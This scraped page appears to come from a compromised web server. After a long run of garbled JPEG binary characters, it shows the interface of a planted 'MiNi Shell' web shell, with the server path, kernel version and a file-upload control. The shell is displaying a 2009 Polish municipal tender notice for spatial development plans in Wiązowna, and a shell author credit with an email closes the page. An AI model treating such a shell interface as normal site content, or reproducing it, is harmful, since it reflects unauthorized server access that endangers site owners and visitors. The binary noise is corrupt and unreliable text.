JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090227/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090227/43840-N-2009.html

<p class="kh_header"><b>Wiązowna: Opracowanie miejscowych planów zagospodarowania przestrzennego Gminy Wiązowna</b><br>
<b>Numer ogłoszenia: 43840 - 2009; data zamieszczenia: 27.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wiązowna , ul. Lubelska 59, 05-462 Wiązowna, woj. mazowieckie, tel. 022 7890128.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> urzad@wiazowna.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie miejscowych planów zagospodarowania przestrzennego Gminy Wiązowna.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest :
1.Opracowanie miejscowych planów zagospodarowania przestrzennego:
1/ Plan zagospodarowania p.n. Góraszka - Centrum Handlowe.  
2/ Trzy plany zagospodarowania p.n. Mienia - etap I, Mienia - etap II i Mienia - etap III.   

Zamawiający dopuszcza możliwość składania oferty częściowej.

Część I zamówienia 
1. Podstawa prawna opracowania: Uchwała Nr 251/XXIX/08 Rady Gminy Wiązowa z dnia 25 listopada 2008r. w sprawie przystąpienia do sporządzania miejscowego planu zagospodarowania przestrzennego pn. Góraszka - Centrum Handlowe, która stanowi zał. nr 1 do specyfikacji istotnych warunków zamówienia. 
Zamówienie obejmuje wykonanie: 
1/ ekofizjografii,
2/ prognozy oddziaływania na środowisko (ewent. ocena strategiczna), 
3/ projektu miejscowego planu zagospodarowania przestrzennego,  
4/ sporządzenia wykazu z bilansem powierzchni dla działek leśnych wymagających uzyskania zgody na zmianę przeznaczenia i analizy ekonomicznej dla działek Skarbu Państwa wymagających ewentualnego uzyskania w/w zgody,
5/ prognozy skutków finansowych opracowania planu,.
2. Szczegółowy zakres opracowania miejscowego planu zagospodarowania przestrzennego pn. Góraszka centrum handlowe został określony w projekcie umowy, która stanowi załącznik nr 5 do SIWZ. 

Część II zamówienia
1. Podstawa prawna opracowania: 
1/ Uchwała Nr 257/XXIX/08 Rady Gminy Wiązowa z dnia  25 listopada 2008r. w sprawie przystąpienia do sporządzania miejscowego planu zagospodarowania przestrzennego p.n. Mienia - etap I, która stanowi  zał. nr 2 do SIWZ.
2/ Uchwała Nr 258/XXIX/08 Rady Gminy Wiązowna z dnia 25 listopada 2008r.  w sprawie przystąpienia do sporządzania miejscowego planu zagospodarowania przestrzennego p.n. Mienia - etap II , która stanowi zał. nr 3 do SIWZ.
3/ Uchwała  Nr 259/XXIX/08 Rady Gminy Wiązowa z dnia 25 listopada 2008r. w sprawie przystąpienia do sporządzenia miejscowego planu zagospodarowania przestrzennego p.n. Mienia - etap III, która stanowi zał. nr 4 do SIWZ.                                                                                     
Zamówienie obejmuje wykonanie dla każdego planu:
1/ ekofizjografii,
2/ prognozy oddziaływania na środowisko (ewent. ocena strategiczna),
3) projektu miejscowego planu zagospodarowania przestrzennego,
4) sporządzenia wykazu z bilansem powierzchni dla działek leśnych wymagających uzyskania zgody na zmianę przeznaczenia i analizy ekonomicznej dla działek Skarbu Państwa wymagających ewentualnego uzyskania w/w zgody,
5) prognozy skutków finansowych opracowania planów,
2. Szczegółowy zakres opracowania trzech miejscowych planów zagospodarowania przestrzennego pn. Mienia - etap I,  Mienia - etap II i  Mienia - etap III, został określony w projekcie umowy, która stanowi zał. nr 6 do SIWZ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 74.25.10.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca zobowiązany jest wnieść wadium w wysokości: 
1/ Dla Części I zamówienia - 1.500,00 zł.
2/ Dla Części II zamówienia - 4.500,00 zł. 
2. Wadium wnosi się przed upływem terminu składania ofert.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienie mogą się ubiegać Wykonawcy, którzy spełniają warunki określone w art.22 ust.1 ustawy:
1)	Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. 
2)	Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.  
3)	Wykonali w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, co najmniej 2 usługi  odpowiadające swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia tj: wykonali co najmniej 2 miejscowe plany zagospodarowania przestrzennego bez względu na obszar. Za wykonane plany należy rozumieć plany  opublikowane w Dzienniku Urzędowym.  
Ponadto wykonawcy przedstawią  wykaz opracowań planistycznych  wykonanych (zakończonych i będących w trakcie opracowania) z okresu ostatnich 3 lat.  
4)	Zapewnią udział w pracach zespołu projektowego specjalistów ze wszystkich dziedzin, wymaganych w związku z przedmiotem postępowania przetargowego i problematyką planów, dysponują minimum 1 pracownikiem przynależącym do izby urbanistów.  
5)	Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego zgodnie z art.24 ust. 1 i 2 ustawy.
6)	Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
7)	Wykażą, że są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzenia swojej działalności gospodarczej.
8) Spełniają i przyjmują warunki określone w SIWZ oraz wzorze/ach umowy/ów..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 2. Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu. 
 Wykonawca składa:
1. Wypełniony i podpisany formularz ofertowy -  zgodnie z załącznikiem nr 7 do SIWZ. 
2. W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności, oraz nie podlega wykluczeniu z postępowania należy do oferty załączyć: 
1) Oświadczenie o spełnieniu warunków udziału w postępowaniu na formularzu stanowiącym załącznik nr 8 do SIWZ.
2) Oświadczenie o nie podleganiu wykluczeniu z postępowania - załącznik nr 9 do SIWZ. 
3) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli  odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie  wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
4) Aktualne zaświadczenie właściwego Naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, ze wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu (wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert).  
3. W celu potwierdzenia, że Wykonawca posiada niezbędną wiedzę i doświadczenie oraz dysponuje osobami zdolnymi do wykonywania zamówienia należy do oferty załączyć. 
1) Wykaz wykonanych w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, co najmniej 2 usług  odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentów potwierdzających, że usługi te zostały wykonane należycie (tj: wykaz wykonanych  co najmniej 2 miejscowych planów zagospodarowania przestrzennego bez względu na obszar) - zgodnie z zał. nr 10 do SIWZ.   Za wykonane plany należy rozumieć plany opublikowane w Dzienniku Urzędowym.     
2) Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia. Do wykazu należy dołączyć  dokumenty stwierdzające, że przynajmniej 1 osoba, która będzie uczestniczyć w wykonywaniu zamówienia posiada wymagane uprawnienia do wykonywania opracowań planistycznych (uprawnienia urbanistyczne lub architektoniczne do projektowania bez ograniczeń) wraz z aktualnym zaświadczeniem o przynależności do właściwej izby samorządu zawodowego.  
3) Pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonywania zamówienia, jeżeli w wykazie, o którym mowa w ppkt. 2 wykonawca wskazał, osoby którymi będzie dysponował - dołączyć (jeżeli dotyczy).
4. W celu potwierdzenia spełnienia warunku dotyczącego znajdowania się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia należy do oferty załączyć:
Polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.  
5. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w  pkt. 1  ppkt.4 i 5  - składa dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
-	nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 m-cy  przed upływem terminu do składania ofert,
-	nie orzeczono wobec niego zakazu ubiegania się o zamówienie,
6. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów o których mowa w pkt. 1  ppkt.4 i 5  zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sadowym administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę  lub miejsce zamieszkania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.wiazowna.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Wiązowna ul. Lubelska 59, 05-462 Wiązowna pok. 209 II piętro.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.03.2009 godzina 10:30, miejsce: Urząd Gminy Wiązowna ul. Lubelska 59, 05-462 Wiązowna Biuro Obsługi Mieszkańców (parter).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Plan zagospodarowania przestrzennego pn. Góraszka - Centrum Handlowe.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część I zamówienia 
1. Podstawa prawna opracowania: Uchwała Nr 251/XXIX/08 Rady Gminy Wiązowa z dnia 25 listopada 2008r. w sprawie przystąpienia do sporządzania miejscowego planu zagospodarowania przestrzennego pn. Góraszka - Centrum Handlowe, która stanowi zał. nr 1 do specyfikacji istotnych warunków zamówienia. 
Zamówienie obejmuje wykonanie: 
1/ ekofizjografii,
2/ prognozy oddziaływania na środowisko (ewent. ocena strategiczna), 
3/ projektu miejscowego planu zagospodarowania przestrzennego,  
4/ sporządzenia wykazu z bilansem powierzchni dla działek leśnych wymagających uzyskania zgody na zmianę przeznaczenia i analizy ekonomicznej dla działek Skarbu Państwa wymagających ewentualnego uzyskania w/w zgody,
5/ prognozy skutków finansowych opracowania planu,.
2. Szczegółowy zakres opracowania miejscowego planu zagospodarowania przestrzennego pn. Góraszka centrum handlowe został określony w projekcie umowy, która stanowi załącznik nr 5 do SIWZ..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 74.25.10.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Trzy plany zagospodarowania pn. Mienia - etap I, Mienia - etap II i Mienia - etap III..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część II zamówienia
1. Podstawa prawna opracowania: 
1/ Uchwała Nr 257/XXIX/08 Rady Gminy Wiązowa z dnia  25 listopada 2008r. w sprawie przystąpienia do sporządzania miejscowego planu zagospodarowania przestrzennego p.n. Mienia - etap I, która stanowi  zał. nr 2 do SIWZ.
2/ Uchwała Nr 258/XXIX/08 Rady Gminy Wiązowna z dnia 25 listopada 2008r.  w sprawie przystąpienia do sporządzania miejscowego planu zagospodarowania przestrzennego p.n. Mienia - etap II , która stanowi zał. nr 3 do SIWZ.
3/ Uchwała  Nr 259/XXIX/08 Rady Gminy Wiązowa z dnia 25 listopada 2008r. w sprawie przystąpienia do sporządzenia miejscowego planu zagospodarowania przestrzennego p.n. Mienia - etap III, która stanowi zał. nr 4 do SIWZ.                                                                                     


Zamówienie obejmuje wykonanie dla każdego planu:
1/ ekofizjografii,
2/ prognozy oddziaływania na środowisko (ewent. ocena strategiczna),
3) projektu miejscowego planu zagospodarowania przestrzennego,
4) sporządzenia wykazu z bilansem powierzchni dla działek leśnych wymagających uzyskania zgody na zmianę przeznaczenia i analizy ekonomicznej dla działek Skarbu Państwa wymagających ewentualnego uzyskania w/w zgody,
5) prognozy skutków finansowych opracowania planów,
2. Szczegółowy zakres opracowania trzech miejscowych planów zagospodarowania przestrzennego pn. Mienia - etap I,  Mienia - etap II i  Mienia - etap III, został określony w projekcie umowy, która stanowi zał. nr 6 do SIWZ..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 74.25.10.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com